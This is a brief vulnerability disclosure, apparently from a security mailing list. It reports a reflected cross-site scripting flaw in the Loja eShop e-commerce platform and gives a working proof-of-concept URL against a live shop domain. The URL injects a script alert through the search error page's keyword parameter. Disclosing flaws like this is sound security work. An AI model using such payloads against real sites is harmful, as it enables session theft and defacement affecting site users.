Loja eShop suffers from a cross site scripting vulnerability.
ecde43e423431c722c71b2a208041c4ded8f1d63cf3042bc3efcc642349ddec7
Hey,
Just looking around and found this e-commerce, this one sell shops based
on templates and type of business.
POC:
this is example shop ;P
http://www.lojaeshop.com.br/index?page=search/search_error&error=not_found&_keyword=guineh%22/%3E%3C/script%3E%3Cscript%3Ealert%28%22guineapig%22%29%3C/script%3E
Isn't validating () in hex code.
sry about english...
Cya,
primehaxor